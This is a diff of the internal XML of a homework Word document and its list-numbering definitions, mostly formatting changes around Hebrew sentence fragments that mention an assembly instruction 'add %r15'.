+                    <a:blip r:embed="rId7" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4638602" cy="1715450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -9916,8 +14237,8 @@
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="14D3154D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="5524C576"/>
-    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
+    <w:tmpl w:val="358A4DE6"/>
+    <w:lvl w:ilvl="0" w:tplc="2000000F">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%1."/>
@@ -10003,6 +14324,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="316E106B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E958950A"/>
+    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="40B114F8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2B72069A"/>
@@ -10091,10 +14501,10 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="454644FE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="5524C576"/>
+    <w:tmpl w:val="E958950A"/>
     <w:lvl w:ilvl="0" w:tplc="2000000F">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -10180,7 +14590,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6AA212B3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="458679F8"/>
@@ -10320,17 +14730,112 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6C09584B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8C480EA2"/>
+    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="653721938">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="282813206">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1742481634">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1980303066">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1992171036">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="2100715997">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -13269,17 +13269,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>add %r15, %</w:t>
+        <w:t>“add %r15, %</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -13313,19 +13303,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> מסעיף 3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, על מנת ש-</w:t>
+        <w:t xml:space="preserve"> מסעיף 3, על מנת ש-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -13422,19 +13400,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> מסעיף 3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> שנרצה להגיע אליה מ-</w:t>
+        <w:t xml:space="preserve"> מסעיף 3 שנרצה להגיע אליה מ-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13723,19 +13689,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> מסעיף 3 שנרצה להגיע </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>מ-</w:t>
+        <w:t xml:space="preserve"> מסעיף 3 שנרצה להגיע מ-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14152,7 +14106,6 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
-          <w:rFonts w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:rtl/>
@@ -14208,19 +14161,6 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:bidi/>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
